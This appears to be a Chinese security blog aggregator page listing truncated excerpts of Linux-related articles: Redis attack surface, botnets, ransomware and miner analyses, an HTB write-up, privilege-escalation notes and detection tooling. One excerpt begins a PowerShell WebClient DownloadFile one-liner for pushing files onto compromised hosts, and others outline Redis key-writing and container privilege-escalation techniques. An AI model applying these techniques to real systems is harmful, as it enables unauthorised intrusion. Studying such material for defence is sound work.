记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

浅析Linux下Redis的攻击面(一)

浅析Linux下Redis的攻击面(一)0x0 前言  Redis在内网渗透中常常扮演着重要的角色,其攻击方式非常多样化,在内网复杂的环境架构中容易出现各种问题,那么如何有效利用Redis的缺陷来达到我们的目的呢,这里笔者结合一些实操场景和大师傅们的文章做了一些分析和总结。0x1 Redis的简介官方简介: Introduction to Redis我的理解:Redis是C语言开发一个开源(遵循BSD)协议高性能的(key-value)键值对的内存NoSQL数据库,可以用作数据库、缓存、信息中间件(性能非常优秀,支持持久化到硬盘且高可用),由于其自身特点,可以广泛应用在数据集群,分布式队列,信息中间件等网络架构中,在内网渗透的突破中,常常扮
发布时间:2020-07-13 12:33 | 阅读:276 | 评论:0 | 标签:linux 攻击

windows/LINUX版本php5.3.3下载地址

WIN地址: https://windows.php.net/downloads/releases/archives/ linux地址: https://museum.php.net/php5/ apache下载地址 http://archive.apache.org/dist/httpd/     httpd.conf 添加 AddType application/x-httpd-php .php yum install libxml2* -y yum -y install libevent libevent-devel  
发布时间:2020-07-03 18:50 | 阅读:3157 | 评论:0 | 标签:学习路上 linux

亡命徒(Outlaw)僵尸网络感染约2万台Linux服务器,腾讯安全提醒企业及时清除

亡命徒(Outlaw)僵尸网络感染约2万台Linux服务器,腾讯安全提醒企业及时清除2020-07-01 15:38:32腾讯安全威胁情报中心检测到国内大量企业遭遇亡命徒(Outlaw)僵尸网络攻击。该僵尸网络最早于2018年被发现,其主要特征为通过SSH爆破攻击目标系统,同时传播基于Perl的Shellbot和门罗币挖矿木马。一、背景腾讯安全威胁情报中心检测到国内大量企业遭遇亡命徒(Outlaw)僵尸网络攻击。亡命徒(Outlaw)僵尸网络最早于2018年被发现,其主要特征为通过SSH爆破攻击目标系统,同时传播基于Perl的Shellbot和门罗币挖矿木马。腾讯安全威胁情报中心安全大数据显示,亡命徒(Outlaw)僵尸网络已造成国内约2万台Linux服务器感染,影响上万家企业。此次攻击传播的母体文件为dota
发布时间:2020-07-01 16:35 | 阅读:3015 | 评论:0 | 标签:linux 僵尸网络

windows/Linux文件下载方式汇总

文章前言在渗透过程中,通常会需要向目标主机传送一些文件,来达到权限提升、权限维持等目的,本篇文章主要介绍一些windows和Linux下常用的文件下载方式。windows命令行自带工具PowerShellPowerShell是一种跨平台的任务自动化和配置管理框架,由命令行管理程序和脚本语言组成,与大多数接受并返回文本的 shell 不同,PowerShell构建在 .NET公共语言运行时 (CLR) 的基础之上,接受并返回.NET对象,这从根本上的改变引入了全新的自动化工具和方法。远程下载文件到本地:powershell (new-object System.Net.WebClient).DownloadFile('http://192.1
发布时间:2020-07-01 12:41 | 阅读:4125 | 评论:0 | 标签:linux

Hack The Box - Postman Writeup - Linux

0x00 前言懒了,原本要保证每个月至少输出一篇blog,翻了翻做的笔记,不是不能拿出来讲的就是片段化的知识点,要是往外发的话,还要加工下,直线刷HTB的时候写了点writeup,稍微整理下发出来了。0x01 渗透思路整理一下撸这个靶机的思路:1. 6379 redis未授权访问漏洞写公钥2. 翻目录找到Matt用户的私钥,john爆破出密码,redis用户su过去到Matt用户,拿到用户权限3. 利用Webmin的洞,配合Matt的登录凭证拿到root权限,over0x02 Hack The Box Postman WriteupIP:10.10.10.1601234567891011121314151617181920212223242526272829303132333435363738394041424
发布时间:2020-06-30 22:07 | 阅读:4816 | 评论:0 | 标签:linux

对Linux 提权的简单总结

m0nk3y@D0g3本文为在我打了9个Vulnhub靶机后,感觉到提权操作及思路,方法有点欠缺的一篇总结性学习笔记(内容均参考自网络和个人整理,文末注明来源。若有错误之处,希望师傅们指正。笔记基本上参考下面这篇文章(有些地方可以说是直接翻译过来的,据说是提权圣经(时间比较久远了,不过核心思想不变,非常有参考价值:https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/什么是权限在Linux 系统中,ls -al 即可查看列出文件所属的权限。这里我用kali 系统来演示。……drwxr-xr-x 2 kali kali 4096 Jan 27 12:52 D
发布时间:2020-06-30 13:50 | 阅读:6890 | 评论:0 | 标签:提权 linux

Linux僵尸网络最新变种现身:Docker服务器惨遭殃及

研究人员近期发现了2个攻击Docker服务器的Linux僵尸网络的变种,分别是XORDDoS 恶意软件和Kaiji DDoS恶意软件。将Docker 服务器作为目标是XORDDoS和 Kaiji恶意软件的新变化,之前这两款恶意软件的目标是云系统中的Linux 主机。最近Kaiji首次被曝影响物联网设备。攻击者常常使用僵尸网络在扫描了SSH 和Telnet端口后执行暴力破解攻击。这两款恶意软件也搜索了暴露2375 端口的Docker服务器。2375端口是Docker API使用的一个端口,用于非加密或非认证的通信。这两个恶意软件变种的攻击方法有明显的差异。XORDDoS 攻击会利用Docker服务器来感染服务器上的容器,而Kaiji 攻击会在感染的服
发布时间:2020-06-29 15:16 | 阅读:3989 | 评论:0 | 标签:linux 僵尸网络

NVIDIA显卡驱动曝出多安全漏洞,部分Windows和Linux设备受到影响

上周,科技巨头Nvidia发布了Nvidia GPU Display Driver中的多个安全漏洞的安全更新。这10个安全漏洞的CVSS 评分在5.5到7.8之间,影响的设备包括Windows和Linux机器。漏洞分析其中影响NVIDIA GPU显卡驱动的安全漏洞分别是:CVE‑2020‑5962CVE‑2020‑5962漏洞位于驱动的Nvidia Control Panel组件中,本地攻击者利用该漏洞可以破坏系统文件,引发DoS攻击或权限提升。CVE‑2020‑5963CVE‑2020‑5963 漏洞位于CUDA 驱动的 Inter Process Communication(进程间通信)API中,漏洞属于不当的访问安全漏洞,攻击者利用该漏洞可以
发布时间:2020-06-28 11:51 | 阅读:5673 | 评论:0 | 标签:漏洞 linux

Linux容器安全:通过`/proc/pid/root`目录来实现权限提升

 前言容器是指一个与主机系统相隔离的工作区域,本质是一种特殊的进程。在Linux操作系统中运行相关容器时(例如Docker与LXC),会使用到多个Linux命名空间来隔离资源以实现虚拟化。基于这个前提,有关容器和命名空间的安全研究大部分都集中在容器逃逸这一层面。但是在某些特定场景下,攻击者能够通过滥用容器和Linux命名空间在目标主机上实现权限提升。这篇文章中我们展示了在处于容器ROOT用户+主机非ROOT权限场景下时,如何借用默认权限且不带有--privileged参数运行的Docker容器在主机层面来实现权限提升。此外,我们还将分享一些关于symlink(符号链接)在命名空间场景下的利用方法。 什么是名称空间(namespaces)?截至目前,Linux内核公
发布时间:2020-06-16 20:52 | 阅读:7735 | 评论:0 | 标签:linux

同时运行在Windows和Linux的勒索软件Tycoon分析

 一、概述Tycoon是一个同时针对Windows和Linux的多平台Java勒索软件,至少从2019年12月起就在野外观察到其恶意活动。该勒索软件以木马化的Java运行时环境(JRE)的形式部署,并利用复杂的Java映像格式保持其隐蔽性。我们观察到,Tycoon勒索软件背后的威胁行为者已经使用了具有较强针对性的交付机制,尝试将恶意软件渗透到教育和软件行业的中小型企业和机构中,勒索软件将对服务器中的文件进行加密并勒索赎金。但是,由于加密过程重复使用了公开的RSA私钥,因此针对较早版本的勒索软件,用户可能无需支付赎金,直接恢复数据。 二、交付BlackBerry研究与情报团队与KPMG英国网络响应服务团队最近共同发现了一种使用Java语言编写的新型勒索软件。勒索软件
发布时间:2020-06-11 17:31 | 阅读:6597 | 评论:0 | 标签:linux

谨防Linux挖矿木马通过Kubernetes途径入侵

谨防Linux挖矿木马通过Kubernetes途径入侵2020-06-02 09:56:01腾讯安全团队接受到部分用户反馈,部分Linux主机检测到名为docker的木马文件。经现场提取排查线索后,发现该挖矿木马疑似通过低版本Kubernetes组件入侵。近日,腾讯安全团队接受到部分用户反馈,部分Linux主机检测到名为docker的木马文件。经现场提取排查线索后,发现该挖矿木马疑似通过低版本Kubernetes组件入侵。入侵成功后在机器内执行恶意sh脚本,恶意脚本则进行同类木马清理,同时从82.146.53.166地址拉取矿机,配置后进行非法挖矿,目前看到的恶意sh脚本主要有以下2个版本。 版本1:    功能结束当前机器内的其它挖矿相关模块,下载执行32/64不同版本的elf矿
发布时间:2020-06-02 13:30 | 阅读:9746 | 评论:0 | 标签:linux 入侵

使用yarGen提取Linux恶意脚本特征

Linux下的恶意软件多为sh脚本,且由于使用的命令大同小异(均为下载文件、运行进程、创建定时任务、写ssh后门等操作),经常难以分辨恶意sh脚本是属于哪个病毒家族的。遇到这种情况,使用yara规则对恶意脚本进行检测分类是个不错的选择,本文将介绍如何借助yargen实现对Linux恶意脚本特征的半自动化提取。什么yarGen?yargen是一个自动化提取yara规则的工具,可以提取strings和opcodes特征,其原理是先解析出样本集中的共同的字符串,然后经过白名单库的过滤,最后通过启发式、机器学习等方式筛选出最优的yara规则,项目地址:https://github.com/Neo23x0/yarGen。下面以8220黑客团伙(StartMi
发布时间:2020-06-01 20:11 | 阅读:8935 | 评论:0 | 标签:linux

Linux系统行为新型实时监控技术

 作者:王建荣万物互联和大数据技术的发展,让我们的生活更加活色生香,其背后离不开安全、稳定可靠的服务器系统。为了保障服务器系统资源能被用户正常使用,避免被恶意行为劫持,我们需要记录服务器系统资源的使用情况、系统行为事件信息和I/O流量等信息,为服务器系统的运维和安全保障工作提供可靠的数据支撑。这里我们主要是从系统日常行为安全的角度分享一种能满足线上部署、能够将进程或文件创建、网络连接、网络I/O、文件I/O、shell操作、数据库操作、telnet操作、http访问、系统调用(syscall)和系统资源信息等系统相关的行为信息实时采集和存储的Linux行为监控技术。 传统监控技术现有系统行为监控的实现技术主要采用的是以下方法:1、Linux Kprobes调试技术
发布时间:2020-05-21 18:53 | 阅读:12271 | 评论:0 | 标签:linux

干货 | linux系统行为新型实时监控技术

点击上方蓝字关注我们万物互联和大数据技术的发展,让我们的生活更加活色生香,其背后离不开安全、稳定可靠的服务器系统。为了保障服务器系统资源能被用户正常使用,避免被恶意行为劫持,我们需要记录服务器系统资源的使用情况、系统行为事件信息和I/O流量等信息,为服务器系统的运维和安全保障工作提供可靠的数据支撑。这里我们主要是从系统日常行为安全的角度分享一种能满足线上部署、能够将进程或文件创建、网络连接、网络I/O、文件I/O、shell操作、数据库操作、telnet操作、http访问、系统调用(syscall)和系统资源信息等
发布时间:2020-05-19 20:16 | 阅读:11766 | 评论:0 | 标签:linux

Windows for Linux 2.0即将发布

Windows Subsystem for Linux允许用户在Windows 10系统中安装和运行Linux发行版。Windows Subsystem for Linux 2 (WSL2)即将在2020年5月发布的更新(Windows 10 2004)中发布,其中引入了一些新的特征和性能提升。WSL version 1 (WSL1)使用了兼容Linux的 kernel,将Linux系统调用翻译使得其可以与window NT kernel进行通信。但这降低了其运行的性能,并使得其很难运行特定的Linux应用。在即将发布的Windows 10 version 2004版本中,微软测试了WSL的一些新特征,使用内置的Linux kernel和全部系统调
发布时间:2020-05-18 13:28 | 阅读:9745 | 评论:0 | 标签:linux

Linux下动态链接流程简要分析

 在CTF PWN中对于Linux底层的考察是很多的,而应用程序如何进行动态链接对于新手来说算是一个小考验,本篇文章主要记录Linux下动态链接的过程以及CTF中关于动态链接的注意点,还有Glibc版本不兼容的坑 内核加载ELF我们都知道应用程序要从C语言代码变成机器可以直接执行的代码要经过编译链接的步骤。在链接中有两种方式,一种是静态链接,一种是动态链接。1.静态链接指的就是程序在链接的过程中,将需要用到的库文件的二进制代码拷贝到程序二进制文件的映像中。2.动态链接指的就是程序在链接的时候并不把库函数链接进程序的映像而是将库函数的映像一起交给用户,用户在运行的时候使用一个叫解释器的东西形如:ld.linux.so的文件进行动态的加载库函数Linux下编译链接过程
发布时间:2020-05-15 12:05 | 阅读:15273 | 评论:0 | 标签:linux

公告

九层之台,起于累土;黑客之术,始于阅读

推广

工具

标签云